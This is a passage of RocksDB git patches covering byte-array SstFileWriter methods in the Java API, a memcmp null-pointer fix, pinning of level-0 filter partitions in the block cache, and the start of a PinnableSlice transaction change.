calculated. - ASSERT_LT(fabs(data.standard_deviation - 57.73), kIota); //sd is ~= 57.73 + ASSERT_LE(fabs(histogram.Percentile(100.0) - 250.0), kIota); + ASSERT_LE(fabs(data.percentile99 - 247.5), kIota); // 99 * 250 / 100 + ASSERT_LE(fabs(data.percentile95 - 237.5), kIota); // 95 * 250 / 100 + ASSERT_LE(fabs(data.median - 125.0), kIota); // 50 * 250 / 100 + ASSERT_EQ(data.average, 125.5); // (1 + 250) / 2 } void EmptyHistogram(Histogram& histogram) { From 78cb6b611295ab7e5d1adc9b1707355ef879bc63 Mon Sep 17 00:00:00 2001 From: Chen Shen Date: Tue, 22 Aug 2017 12:46:29 -0700 Subject: [PATCH 138/205] Provide byte[] version of SstFileWriter.merge to reduce GC Stall Summary: In Java API, `SstFileWriter.put/merge/delete` takes `Slice` type of key and value, which is a Java wrapper object around C++ Slice object. The Slice object inherited [ `finalize`](https://github.com/facebook/rocksdb/blob/3c327ac2d0fd50bbd82fe1f1af5de909dad769e6/java/src/main/java/org/rocksdb/AbstractNativeReference.java#L69) method, which [added huge overhead](https://softwareengineering.stackexchange.com/questions/288715/is-overriding-object-finalize-really-bad/288753#288753) to JVM while creating new SstFile. To address this issue, this PR overload the merge method to take Java byte array instead of the Slice object, and added unit test for it. We also benchmark these two different merge function, where we could see GC Stall reduced from 50% to 1%, and the throughput increased from 50MB to 200MB. Closes https://github.com/facebook/rocksdb/pull/2746 Reviewed By: sagar0 Differential Revision: D5653145 Pulled By: scv119 fbshipit-source-id: b55ea58554b573d0b1c6f6170f8d9223811bc4f5 --- java/rocksjni/sst_file_writerjni.cc | 116 ++++++++++++++++-- .../main/java/org/rocksdb/SstFileWriter.java | 50 ++++++++ .../java/org/rocksdb/SstFileWriterTest.java | 26 +++- 3 files changed, 180 insertions(+), 12 deletions(-) diff --git a/java/rocksjni/sst_file_writerjni.cc b/java/rocksjni/sst_file_writerjni.cc index 40595fb95df..ceb93384acc 100644 --- a/java/rocksjni/sst_file_writerjni.cc +++ b/java/rocksjni/sst_file_writerjni.cc @@ -77,9 +77,9 @@ void Java_org_rocksdb_SstFileWriter_open(JNIEnv *env, jobject jobj, * Method: put * Signature: (JJJ)V */ -void Java_org_rocksdb_SstFileWriter_put(JNIEnv *env, jobject jobj, - jlong jhandle, jlong jkey_handle, - jlong jvalue_handle) { +void Java_org_rocksdb_SstFileWriter_put__JJJ(JNIEnv *env, jobject jobj, + jlong jhandle, jlong jkey_handle, + jlong jvalue_handle) { auto *key_slice = reinterpret_cast(jkey_handle); auto *value_slice = reinterpret_cast(jvalue_handle); rocksdb::Status s = @@ -90,14 +90,51 @@ void Java_org_rocksdb_SstFileWriter_put(JNIEnv *env, jobject jobj, } } +/* + * Class: org_rocksdb_SstFileWriter + * Method: put + * Signature: (JJJ)V + */ + void Java_org_rocksdb_SstFileWriter_put__J_3B_3B(JNIEnv *env, jobject jobj, + jlong jhandle, jbyteArray jkey, + jbyteArray jval) { + jbyte* key = env->GetByteArrayElements(jkey, nullptr); + if(key == nullptr) { + // exception thrown: OutOfMemoryError + return; + } + rocksdb::Slice key_slice( + reinterpret_cast(key), env->GetArrayLength(jkey)); + + jbyte* value = env->GetByteArrayElements(jval, nullptr); + if(value == nullptr) { + // exception thrown: OutOfMemoryError + env->ReleaseByteArrayElements(jkey, key, JNI_ABORT); + return; + } + rocksdb::Slice value_slice( + reinterpret_cast(value), env->GetArrayLength(jval)); + + rocksdb::Status s = + reinterpret_cast(jhandle)->Put(key_slice, + value_slice); + + env->ReleaseByteArrayElements(jkey, key, JNI_ABORT); + env->ReleaseByteArrayElements(jval, value, JNI_ABORT); + + if (!s.ok()) { + rocksdb::RocksDBExceptionJni::ThrowNew(env, s); + } +} + /* * Class: org_rocksdb_SstFileWriter * Method: merge * Signature: (JJJ)V */ -void Java_org_rocksdb_SstFileWriter_merge(JNIEnv *env, jobject jobj, - jlong jhandle, jlong jkey_handle, - jlong jvalue_handle) { +void Java_org_rocksdb_SstFileWriter_merge__JJJ(JNIEnv *env, jobject jobj, + jlong jhandle, jlong jkey_handle, + jlong jvalue_handle) { auto *key_slice = reinterpret_cast(jkey_handle); auto *value_slice = reinterpret_cast(jvalue_handle); rocksdb::Status s = @@ -108,13 +145,76 @@ void Java_org_rocksdb_SstFileWriter_merge(JNIEnv *env, jobject jobj, } } +/* + * Class: org_rocksdb_SstFileWriter + * Method: merge + * Signature: (J[B[B)V + */ +void Java_org_rocksdb_SstFileWriter_merge__J_3B_3B(JNIEnv *env, jobject jobj, + jlong jhandle, jbyteArray jkey, + jbyteArray jval) { + + jbyte* key = env->GetByteArrayElements(jkey, nullptr); + if(key == nullptr) { + // exception thrown: OutOfMemoryError + return; + } + rocksdb::Slice key_slice( + reinterpret_cast(key), env->GetArrayLength(jkey)); + + jbyte* value = env->GetByteArrayElements(jval, nullptr); + if(value == nullptr) { + // exception thrown: OutOfMemoryError + env->ReleaseByteArrayElements(jkey, key, JNI_ABORT); + return; + } + rocksdb::Slice value_slice( + reinterpret_cast(value), env->GetArrayLength(jval)); + + rocksdb::Status s = + reinterpret_cast(jhandle)->Merge(key_slice, + value_slice); + + env->ReleaseByteArrayElements(jkey, key, JNI_ABORT); + env->ReleaseByteArrayElements(jval, value, JNI_ABORT); + + if (!s.ok()) { + rocksdb::RocksDBExceptionJni::ThrowNew(env, s); + } +} + +/* + * Class: org_rocksdb_SstFileWriter + * Method: delete + * Signature: (JJJ)V + */ +void Java_org_rocksdb_SstFileWriter_delete__J_3B(JNIEnv *env, jobject jobj, + jlong jhandle, jbyteArray jkey) { + jbyte* key = env->GetByteArrayElements(jkey, nullptr); + if(key == nullptr) { + // exception thrown: OutOfMemoryError + return; + } + rocksdb::Slice key_slice( + reinterpret_cast(key), env->GetArrayLength(jkey)); + + rocksdb::Status s = + reinterpret_cast(jhandle)->Delete(key_slice); + + env->ReleaseByteArrayElements(jkey, key, JNI_ABORT); + + if (!s.ok()) { + rocksdb::RocksDBExceptionJni::ThrowNew(env, s); + } +} + /* * Class: org_rocksdb_SstFileWriter * Method: delete * Signature: (JJJ)V */ -void Java_org_rocksdb_SstFileWriter_delete(JNIEnv *env, jobject jobj, - jlong jhandle, jlong jkey_handle) { + void Java_org_rocksdb_SstFileWriter_delete__JJ(JNIEnv *env, jobject jobj, + jlong jhandle, jlong jkey_handle) { auto *key_slice = reinterpret_cast(jkey_handle); rocksdb::Status s = reinterpret_cast(jhandle)->Delete(*key_slice); diff --git a/java/src/main/java/org/rocksdb/SstFileWriter.java b/java/src/main/java/org/rocksdb/SstFileWriter.java index 8fe576082e8..5f35f0f61db 100644 --- a/java/src/main/java/org/rocksdb/SstFileWriter.java +++ b/java/src/main/java/org/rocksdb/SstFileWriter.java @@ -117,6 +117,20 @@ public void put(final DirectSlice key, final DirectSlice value) put(nativeHandle_, key.getNativeHandle(), value.getNativeHandle()); } + /** + * Add a Put key with value to currently opened file. + * + * @param key the specified key to be inserted. + * @param value the value associated with the specified key. + * + * @throws RocksDBException thrown if error happens in underlying + * native library. + */ +public void put(final byte[] key, final byte[] value) + throws RocksDBException { + put(nativeHandle_, key, value); +} + /** * Add a Merge key with value to currently opened file. * @@ -132,6 +146,21 @@ public void merge(final Slice key, final Slice value) merge(nativeHandle_, key.getNativeHandle(), value.getNativeHandle()); } + /** + * Add a Merge key with value to currently opened file. + * + * @param key the specified key to be merged. + * @param value the value to be merged with the current value for + * the specified key. + * + * @throws RocksDBException thrown if error happens in underlying + * native library. + */ + public void merge(final byte[] key, final byte[] value) + throws RocksDBException { + merge(nativeHandle_, key, value); + } + /** * Add a Merge key with value to currently opened file. * @@ -171,6 +200,18 @@ public void delete(final DirectSlice key) throws RocksDBException { delete(nativeHandle_, key.getNativeHandle()); } + /** + * Add a deletion key to currently opened file. + * + * @param key the specified key to be deleted. + * + * @throws RocksDBException thrown if error happens in underlying + * native library. + */ + public void delete(final byte[] key) throws RocksDBException { + delete(nativeHandle_, key); + } + /** * Finish the process and close the sst file. * @@ -193,13 +234,22 @@ private native void open(final long handle, final String filePath) private native void put(final long handle, final long keyHandle, final long valueHandle) throws RocksDBException; + + private native void put(final long handle, final byte[] key, + final byte[] value) throws RocksDBException; private native void merge(final long handle, final long keyHandle, final long valueHandle) throws RocksDBException; + private native void merge(final long handle, final byte[] key, + final byte[] value) throws RocksDBException; + private native void delete(final long handle, final long keyHandle) throws RocksDBException; + private native void delete(final long handle, final byte[] key) + throws RocksDBException; + private native void finish(final long handle) throws RocksDBException; @Override protected final native void disposeInternal(final long handle); diff --git a/java/src/test/java/org/rocksdb/SstFileWriterTest.java b/java/src/test/java/org/rocksdb/SstFileWriterTest.java index 8c3b0c3d9f5..6261210b129 100644 --- a/java/src/test/java/org/rocksdb/SstFileWriterTest.java +++ b/java/src/test/java/org/rocksdb/SstFileWriterTest.java @@ -30,7 +30,7 @@ public class SstFileWriterTest { @Rule public TemporaryFolder parentFolder = new TemporaryFolder(); - enum OpType { PUT, MERGE, DELETE } + enum OpType { PUT, PUT_BYTES, MERGE, MERGE_BYTES, DELETE, DELETE_BYTES} class KeyValueWithOp { KeyValueWithOp(String key, String value, OpType opType) { @@ -79,16 +79,27 @@ private File newSstFile(final List keyValues, for (KeyValueWithOp keyValue : keyValues) { Slice keySlice = new Slice(keyValue.getKey()); Slice valueSlice = new Slice(keyValue.getValue()); + byte[] keyBytes = keyValue.getKey().getBytes(); + byte[] valueBytes = keyValue.getValue().getBytes(); switch (keyValue.getOpType()) { case PUT: sstFileWriter.put(keySlice, valueSlice); break; + case PUT_BYTES: + sstFileWriter.put(keyBytes, valueBytes); + break; case MERGE: sstFileWriter.merge(keySlice, valueSlice); break; + case MERGE_BYTES: + sstFileWriter.merge(keyBytes, valueBytes); + break; case DELETE: sstFileWriter.delete(keySlice); break; + case DELETE_BYTES: + sstFileWriter.delete(keyBytes); + break; default: fail("Unsupported op type"); } @@ -142,8 +153,12 @@ public void ingestSstFile() throws RocksDBException, IOException { final List keyValues = new ArrayList<>(); keyValues.add(new KeyValueWithOp("key1", "value1", OpType.PUT)); keyValues.add(new KeyValueWithOp("key2", "value2", OpType.PUT)); - keyValues.add(new KeyValueWithOp("key3", "value3", OpType.MERGE)); - keyValues.add(new KeyValueWithOp("key4", "", OpType.DELETE)); + keyValues.add(new KeyValueWithOp("key3", "value3", OpType.PUT_BYTES)); + keyValues.add(new KeyValueWithOp("key4", "value4", OpType.MERGE)); + keyValues.add(new KeyValueWithOp("key5", "value5", OpType.MERGE_BYTES)); + keyValues.add(new KeyValueWithOp("key6", "", OpType.DELETE)); + keyValues.add(new KeyValueWithOp("key7", "", OpType.DELETE)); + final File sstFile = newSstFile(keyValues, false); final File dbFolder = parentFolder.newFolder(DB_DIRECTORY_NAME); @@ -161,7 +176,10 @@ public void ingestSstFile() throws RocksDBException, IOException { assertThat(db.get("key1".getBytes())).isEqualTo("value1".getBytes()); assertThat(db.get("key2".getBytes())).isEqualTo("value2".getBytes()); assertThat(db.get("key3".getBytes())).isEqualTo("value3".getBytes()); - assertThat(db.get("key4".getBytes())).isEqualTo(null); + assertThat(db.get("key4".getBytes())).isEqualTo("value4".getBytes()); + assertThat(db.get("key5".getBytes())).isEqualTo("value5".getBytes()); + assertThat(db.get("key6".getBytes())).isEqualTo(null); + assertThat(db.get("key7".getBytes())).isEqualTo(null); } } From 39ef900551a4d88c8546ca086baaba76730e6162 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Tue, 22 Aug 2017 16:40:55 -0700 Subject: [PATCH 139/205] stop calling memcmp with nullptrs Summary: it doesn't take nullptr according to its declaration in glibc, and calling it in this way causes our sanitizers (ubsan, clang analyze) to fail. Closes https://github.com/facebook/rocksdb/pull/2776 Differential Revision: D5683260 Pulled By: ajkr fbshipit-source-id: 114b137ee188172f96eedc43139255cae7bee80a --- include/rocksdb/slice.h | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index d1786dd44da..ec33c97e632 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -213,18 +213,17 @@ inline bool operator!=(const Slice& x, const Slice& y) { return !(x == y); } -// UBSAN complain that we pass nullptr to memcmp that's fine since -// we always do that for a string of len = 0 -#ifdef ROCKSDB_UBSAN_RUN -#if defined(__clang__) -__attribute__((__no_sanitize__("undefined"))) -#elif defined(__GNUC__) -__attribute__((__no_sanitize_undefined__)) -#endif -#endif inline int Slice::compare(const Slice& b) const { const size_t min_len = (size_ < b.size_) ? size_ : b.size_; - assert((data_ != nullptr && b.data_ != nullptr) || min_len == 0); + if (min_len == 0) { + if (size_ > 0) { + return 1; + } else if (b.size_ > 0) { + return -1; + } + return 0; + } + assert(data_ != nullptr && b.data_ != nullptr); int r = memcmp(data_, b.data_, min_len); if (r == 0) { if (size_ < b.size_) r = -1; From 1dfcdb15f93018c67f1d3528b60738dc0d3b5d05 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Wed, 23 Aug 2017 07:48:54 -0700 Subject: [PATCH 140/205] Extend pin_l0 to filter partitions Summary: This is the continuation of https://github.com/facebook/rocksdb/pull/2661 for filter partitions. When pin_l0 is set (along with cache_xxx), then open table open the filter partitions are loaded into the cache and pinned there. Closes https://github.com/facebook/rocksdb/pull/2766 Differential Revision: D5671098 Pulled By: maysamyabandeh fbshipit-source-id: 174f24018f1d7f1129621e7380287b65b67d2115 --- table/block_based_table_reader.cc | 68 ++++++++----- table/block_based_table_reader.h | 15 ++- table/filter_block.h | 5 +- table/partitioned_filter_block.cc | 130 ++++++++++++++++++------- table/partitioned_filter_block.h | 13 +-- table/partitioned_filter_block_test.cc | 9 +- 6 files changed, 163 insertions(+), 77 deletions(-) diff --git a/table/block_based_table_reader.cc b/table/block_based_table_reader.cc index 7e236e8bfff..e047c644325 100644 --- a/table/block_based_table_reader.cc +++ b/table/block_based_table_reader.cc @@ -291,7 +291,8 @@ class PartitionIndexReader : public IndexReader, public Cleanable { } BlockBasedTable* table_; std::unique_ptr index_block_; - std::map> partition_map_; + std::unordered_map> + partition_map_; }; // Index that allows binary search lookup for the first key of each block. @@ -797,14 +798,13 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, rep->ioptions.info_log); } - // pre-fetching of blocks is turned on + const bool pin = + rep->table_options.pin_l0_filter_and_index_blocks_in_cache && level == 0; + // pre-fetching of blocks is turned on // Will use block cache for index/filter blocks access // Always prefetch index and filter for level 0 if (table_options.cache_index_and_filter_blocks) { if (prefetch_index_and_filter_in_cache || level == 0) { - const bool pin = - rep->table_options.pin_l0_filter_and_index_blocks_in_cache && - level == 0; assert(table_options.block_cache != nullptr); // Hack: Call NewIndexIterator() to implicitly add index to the // block_cache @@ -823,15 +823,15 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, if (s.ok()) { // Hack: Call GetFilter() to implicitly add filter to the block_cache auto filter_entry = new_table->GetFilter(); + if (filter_entry.value != nullptr) { + filter_entry.value->CacheDependencies(pin); + } // if pin_l0_filter_and_index_blocks_in_cache is true, and this is // a level0 file, then save it in rep_->filter_entry; it will be // released in the destructor only, hence it will be pinned in the // cache while this reader is alive if (pin) { rep->filter_entry = filter_entry; - if (rep->filter_entry.value != nullptr) { - rep->filter_entry.value->SetLevel(level); - } } else { filter_entry.Release(table_options.block_cache.get()); } @@ -844,17 +844,25 @@ Status BlockBasedTable::Open(const ImmutableCFOptions& ioptions, IndexReader* index_reader = nullptr; s = new_table->CreateIndexReader(prefetch_buffer.get(), &index_reader, meta_iter.get(), level); - if (s.ok()) { rep->index_reader.reset(index_reader); + // The partitions of partitioned index are always stored in cache. They + // are hence follow the configuration for pin and prefetch regardless of + // the value of cache_index_and_filter_blocks + if (prefetch_index_and_filter_in_cache || level == 0) { + rep->index_reader->CacheDependencies(pin); + } // Set filter block if (rep->filter_policy) { const bool is_a_filter_partition = true; - rep->filter.reset(new_table->ReadFilter( - prefetch_buffer.get(), rep->filter_handle, !is_a_filter_partition)); - if (rep->filter.get()) { - rep->filter->SetLevel(level); + auto filter = new_table->ReadFilter( + prefetch_buffer.get(), rep->filter_handle, !is_a_filter_partition); + rep->filter.reset(filter); + // Refer to the comment above about paritioned indexes always being + // cached + if (filter && (prefetch_index_and_filter_in_cache || level == 0)) { + filter->CacheDependencies(pin); } } } else { @@ -1171,15 +1179,16 @@ FilterBlockReader* BlockBasedTable::ReadFilter( } BlockBasedTable::CachableEntry BlockBasedTable::GetFilter( - bool no_io) const { + FilePrefetchBuffer* prefetch_buffer, bool no_io) const { const BlockHandle& filter_blk_handle = rep_->filter_handle; const bool is_a_filter_partition = true; - return GetFilter(filter_blk_handle, !is_a_filter_partition, no_io); + return GetFilter(prefetch_buffer, filter_blk_handle, !is_a_filter_partition, + no_io); } BlockBasedTable::CachableEntry BlockBasedTable::GetFilter( - const BlockHandle& filter_blk_handle, const bool is_a_filter_partition, - bool no_io) const { + FilePrefetchBuffer* prefetch_buffer, const BlockHandle& filter_blk_handle, + const bool is_a_filter_partition, bool no_io) const { // If cache_index_and_filter_blocks is false, filter should be pre-populated. // We will return rep_->filter anyway. rep_->filter can be nullptr if filter // read fails at Open() time. We don't want to reload again since it will @@ -1219,8 +1228,8 @@ BlockBasedTable::CachableEntry BlockBasedTable::GetFilter( // Do not invoke any io. return CachableEntry(); } else { - filter = ReadFilter(nullptr /* prefetch_buffer */, filter_blk_handle, - is_a_filter_partition); + filter = + ReadFilter(prefetch_buffer, filter_blk_handle, is_a_filter_partition); if (filter != nullptr) { assert(filter->size() > 0); Status s = block_cache->Insert( @@ -1482,7 +1491,7 @@ Status BlockBasedTable::MaybeLoadDataBlockToCache( BlockBasedTable::BlockEntryIteratorState::BlockEntryIteratorState( BlockBasedTable* table, const ReadOptions& read_options, const InternalKeyComparator* icomparator, bool skip_filters, bool is_index, - std::map>* block_map) + std::unordered_map>* block_map) : TwoLevelIteratorState(table->rep_->ioptions.prefix_extractor != nullptr), table_(table), read_options_(read_options), @@ -1501,9 +1510,19 @@ BlockBasedTable::BlockEntryIteratorState::NewSecondaryIterator( auto rep = table_->rep_; if (block_map_) { auto block = block_map_->find(handle.offset()); - assert(block != block_map_->end()); - return block->second.value->NewIterator(&rep->internal_comparator, nullptr, - true, rep->ioptions.statistics); + // This is a possible scenario since block cache might not have had space + // for the partition + if (block != block_map_->end()) { + PERF_COUNTER_ADD(block_cache_hit_count, 1); + RecordTick(rep->ioptions.statistics, BLOCK_CACHE_INDEX_HIT); + RecordTick(rep->ioptions.statistics, BLOCK_CACHE_HIT); + Cache* block_cache = rep->table_options.block_cache.get(); + assert(block_cache); + RecordTick(rep->ioptions.statistics, BLOCK_CACHE_BYTES_READ, + block_cache->GetUsage(block->second.cache_handle)); + return block->second.value->NewIterator( + &rep->internal_comparator, nullptr, true, rep->ioptions.statistics); + } } return NewDataBlockIterator(rep, read_options_, handle, nullptr, is_index_, s); @@ -1700,7 +1719,8 @@ Status BlockBasedTable::Get(const ReadOptions& read_options, const Slice& key, const bool no_io = read_options.read_tier == kBlockCacheTier; CachableEntry filter_entry; if (!skip_filters) { - filter_entry = GetFilter(read_options.read_tier == kBlockCacheTier); + filter_entry = GetFilter(/*prefetch_buffer*/ nullptr, + read_options.read_tier == kBlockCacheTier); } FilterBlockReader* filter = filter_entry.value; diff --git a/table/block_based_table_reader.h b/table/block_based_table_reader.h index 640a7065645..a5426cdedf7 100644 --- a/table/block_based_table_reader.h +++ b/table/block_based_table_reader.h @@ -183,6 +183,9 @@ class BlockBasedTable : public TableReader { virtual void CacheDependencies(bool /* unused */) {} + // Prefetch all the blocks referenced by this index to the buffer + void PrefetchBlocks(FilePrefetchBuffer* buf); + protected: const InternalKeyComparator* icomparator_; @@ -210,6 +213,7 @@ class BlockBasedTable : public TableReader { explicit BlockBasedTable(Rep* rep) : rep_(rep) {} private: + friend class MockedBlockBasedTable; // input_iter: if it is not null, update this one and return it as Iterator static InternalIterator* NewDataBlockIterator(Rep* rep, const ReadOptions& ro, const Slice& index_value, @@ -239,10 +243,11 @@ class BlockBasedTable : public TableReader { // For the following two functions: // if `no_io == true`, we will not try to read filter/index from sst file // were they not present in cache yet. - CachableEntry GetFilter(bool no_io = false) const; + CachableEntry GetFilter( + FilePrefetchBuffer* prefetch_buffer = nullptr, bool no_io = false) const; virtual CachableEntry GetFilter( - const BlockHandle& filter_blk_handle, const bool is_a_filter_partition, - bool no_io) const; + FilePrefetchBuffer* prefetch_buffer, const BlockHandle& filter_blk_handle, + const bool is_a_filter_partition, bool no_io) const; // Get the iterator from the index reader. // If input_iter is not set, return new Iterator @@ -352,7 +357,7 @@ class BlockBasedTable::BlockEntryIteratorState : public TwoLevelIteratorState { BlockBasedTable* table, const ReadOptions& read_options, const InternalKeyComparator* icomparator, bool skip_filters, bool is_index = false, - std::map>* block_map = nullptr); + std::unordered_map>* block_map = nullptr); InternalIterator* NewSecondaryIterator(const Slice& index_value) override; bool PrefixMayMatch(const Slice& internal_key) override; bool KeyReachedUpperBound(const Slice& internal_key) override; @@ -365,7 +370,7 @@ class BlockBasedTable::BlockEntryIteratorState : public TwoLevelIteratorState { bool skip_filters_; // true if the 2nd level iterator is on indexes instead of on user data. bool is_index_; - std::map>* block_map_; + std::unordered_map>* block_map_; port::RWMutex cleaner_mu; }; diff --git a/table/filter_block.h b/table/filter_block.h index 94136f659e1..7bf3b31324d 100644 --- a/table/filter_block.h +++ b/table/filter_block.h @@ -108,15 +108,14 @@ class FilterBlockReader { bool whole_key_filtering() const { return whole_key_filtering_; } - int GetLevel() const { return level_; } - void SetLevel(int level) { level_ = level; } - // convert this object to a human readable form virtual std::string ToString() const { std::string error_msg("Unsupported filter \n"); return error_msg; } + virtual void CacheDependencies(bool pin) {} + protected: bool whole_key_filtering_; diff --git a/table/partitioned_filter_block.cc b/table/partitioned_filter_block.cc index d3d7949d09f..202245939fe 100644 --- a/table/partitioned_filter_block.cc +++ b/table/partitioned_filter_block.cc @@ -7,6 +7,7 @@ #include +#include "monitoring/perf_context_imp.h" #include "port/port.h" #include "rocksdb/filter_policy.h" #include "table/block.h" @@ -100,19 +101,29 @@ PartitionedFilterBlockReader::PartitionedFilterBlockReader( } PartitionedFilterBlockReader::~PartitionedFilterBlockReader() { - { - ReadLock rl(&mu_); - for (auto it = handle_list_.begin(); it != handle_list_.end(); ++it) { - table_->rep_->table_options.block_cache.get()->Release(*it); - } + // TODO(myabandeh): if instead of filter object we store only the blocks in + // block cache, then we don't have to manually earse them from block cache + // here. + auto block_cache = table_->rep_->table_options.block_cache.get(); + if (UNLIKELY(block_cache == nullptr)) { + return; } char cache_key[BlockBasedTable::kMaxCacheKeyPrefixSize + kMaxVarint64Length]; - for (auto it = filter_block_set_.begin(); it != filter_block_set_.end(); - ++it) { + BlockIter biter; + BlockHandle handle; + idx_on_fltr_blk_->NewIterator(&comparator_, &biter, true); + biter.SeekToFirst(); + for (; biter.Valid(); biter.Next()) { + auto input = biter.value(); + auto s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + continue; + } auto key = BlockBasedTable::GetCacheKey(table_->rep_->cache_key_prefix, table_->rep_->cache_key_prefix_size, - *it, cache_key); - table_->rep_->table_options.block_cache.get()->Erase(key); + handle, cache_key); + block_cache->Erase(key); } } @@ -205,34 +216,22 @@ PartitionedFilterBlockReader::GetFilterPartition( const bool is_a_filter_partition = true; auto block_cache = table_->rep_->table_options.block_cache.get(); if (LIKELY(block_cache != nullptr)) { - bool pin_cached_filters = - GetLevel() == 0 && - table_->rep_->table_options.pin_l0_filter_and_index_blocks_in_cache; - if (pin_cached_filters) { - ReadLock rl(&mu_); - auto iter = filter_cache_.find(fltr_blk_handle.offset()); - if (iter != filter_cache_.end()) { + if (filter_map_.size() != 0) { + auto iter = filter_map_.find(fltr_blk_handle.offset()); + // This is a possible scenario since block cache might not have had space + // for the partition + if (iter != filter_map_.end()) { + PERF_COUNTER_ADD(block_cache_hit_count, 1); RecordTick(statistics(), BLOCK_CACHE_FILTER_HIT); + RecordTick(statistics(), BLOCK_CACHE_HIT); + RecordTick(statistics(), BLOCK_CACHE_BYTES_READ, + block_cache->GetUsage(iter->second.cache_handle)); *cached = true; - return {iter->second, nullptr}; - } - } - auto filter = - table_->GetFilter(fltr_blk_handle, is_a_filter_partition, no_io); - if (filter.IsSet()) { - WriteLock wl(&mu_); - filter_block_set_.insert(fltr_blk_handle); - if (pin_cached_filters) { - std::pair pair(fltr_blk_handle.offset(), - filter.value); - auto succ = filter_cache_.insert(pair).second; - if (succ) { - handle_list_.push_back(filter.cache_handle); - } // Otherwise it is already inserted by a concurrent thread - *cached = true; + return iter->second; } } - return filter; + return table_->GetFilter(/*prefetch_buffer*/ nullptr, fltr_blk_handle, + is_a_filter_partition, no_io); } else { auto filter = table_->ReadFilter(prefetch_buffer, fltr_blk_handle, is_a_filter_partition); @@ -244,4 +243,69 @@ size_t PartitionedFilterBlockReader::ApproximateMemoryUsage() const { return idx_on_fltr_blk_->size(); } +// TODO(myabandeh): merge this with the same function in IndexReader +void PartitionedFilterBlockReader::CacheDependencies(bool pin) { + // Before read partitions, prefetch them to avoid lots of IOs + auto rep = table_->rep_; + BlockIter biter; + BlockHandle handle; + idx_on_fltr_blk_->NewIterator(&comparator_, &biter, true); + // Index partitions are assumed to be consecuitive. Prefetch them all. + // Read the first block offset + biter.SeekToFirst(); + Slice input = biter.value(); + Status s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + ROCKS_LOG_WARN(rep->ioptions.info_log, + "Could not read first index partition"); + return; + } + uint64_t prefetch_off = handle.offset(); + + // Read the last block's offset + biter.SeekToLast(); + input = biter.value(); + s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + ROCKS_LOG_WARN(rep->ioptions.info_log, + "Could not read last index partition"); + return; + } + uint64_t last_off = handle.offset() + handle.size() + kBlockTrailerSize; + uint64_t prefetch_len = last_off - prefetch_off; + std::unique_ptr prefetch_buffer; + auto& file = table_->rep_->file; + prefetch_buffer.reset(new FilePrefetchBuffer()); + s = prefetch_buffer->Prefetch(file.get(), prefetch_off, prefetch_len); + + // After prefetch, read the partitions one by one + biter.SeekToFirst(); + Cache* block_cache = rep->table_options.block_cache.get(); + for (; biter.Valid(); biter.Next()) { + input = biter.value(); + s = handle.DecodeFrom(&input); + assert(s.ok()); + if (!s.ok()) { + ROCKS_LOG_WARN(rep->ioptions.info_log, "Could not read index partition"); + continue; + } + + const bool no_io = true; + const bool is_a_filter_partition = true; + auto filter = table_->GetFilter(prefetch_buffer.get(), handle, + is_a_filter_partition, !no_io); + if (LIKELY(filter.IsSet())) { + if (pin) { + filter_map_[handle.offset()] = std::move(filter); + } else { + block_cache->Release(filter.cache_handle); + } + } else { + delete filter.value; + } + } +} + } // namespace rocksdb diff --git a/table/partitioned_filter_block.h b/table/partitioned_filter_block.h index d408175390f..1a00a86e6ce 100644 --- a/table/partitioned_filter_block.h +++ b/table/partitioned_filter_block.h @@ -88,20 +88,15 @@ class PartitionedFilterBlockReader : public FilterBlockReader { BlockBasedTable::CachableEntry GetFilterPartition( FilePrefetchBuffer* prefetch_buffer, Slice* handle, const bool no_io, bool* cached); + virtual void CacheDependencies(bool pin) override; const SliceTransform* prefix_extractor_; std::unique_ptr idx_on_fltr_blk_; const Comparator& comparator_; const BlockBasedTable* table_; - std::unordered_map filter_cache_; - autovector handle_list_; - struct BlockHandleCmp { - bool operator()(const BlockHandle& lhs, const BlockHandle& rhs) const { - return lhs.offset() < rhs.offset(); - } - }; - std::set filter_block_set_; - port::RWMutex mu_; + std::unordered_map> + filter_map_; }; } // namespace rocksdb diff --git a/table/partitioned_filter_block_test.cc b/table/partitioned_filter_block_test.cc index a49143dae2f..1bc529ed974 100644 --- a/table/partitioned_filter_block_test.cc +++ b/table/partitioned_filter_block_test.cc @@ -22,11 +22,14 @@ std::map slices; class MockedBlockBasedTable : public BlockBasedTable { public: - explicit MockedBlockBasedTable(Rep* rep) : BlockBasedTable(rep) {} + explicit MockedBlockBasedTable(Rep* rep) : BlockBasedTable(rep) { + // Initialize what Open normally does as much as necessary for the test + rep->cache_key_prefix_size = 10; + } virtual CachableEntry GetFilter( - const BlockHandle& filter_blk_handle, const bool is_a_filter_partition, - bool no_io) const override { + FilePrefetchBuffer*, const BlockHandle& filter_blk_handle, + const bool /* unused */, bool /* unused */) const override { Slice slice = slices[filter_blk_handle.offset()]; auto obj = new FullFilterBlockReader( nullptr, true, BlockContents(slice, false, kNoCompression), From ccf7f833e320c8a5c7d531ca81f3a79c8a5acd20 Mon Sep 17 00:00:00 2001 From: Maysam Yabandeh Date: Wed, 23 Aug 2017 10:01:17 -0700 Subject: [PATCH 141/205] Use PinnableSlice in Transactions Summary: The ::Get from DB is not augmented with an overload method that takes a PinnableSlice instead of a string. Transactions however are not yet upgraded to use the new API. As a result, transaction users such as MyRocks cannot benefit from it. This patch updates the transactional API with a PinnableSlice overload. Closes https://github.com/facebook/rocksdb/pull/2736 Differential Revision: D5645770 Pulled By: maysamyabandeh fbshipit-source-id: f6af520df902f842de1bcf99bed3e8dfc43ad96d --- include/rocksdb/utilities/transaction.h | 34 +++++++++++ .../utilities/write_batch_with_index.h | 10 ++++ utilities/transactions/transaction_base.cc | 36 +++++++++++- utilities/transactions/transaction_base.h | 9 +++ .../write_batch_with_index.cc | 56 +++++++++++++++---- 5 files changed, 132 insertions(+), 13 deletions(-) diff --git a/include/rocksdb/utilities/transaction.h b/include/rocksdb/utilities/transaction.h index 8507ef133fb..a3519739c21 100644 --- a/include/rocksdb/utilities/transaction.h +++ b/include/rocksdb/utilities/transaction.h @@ -169,8 +169,26 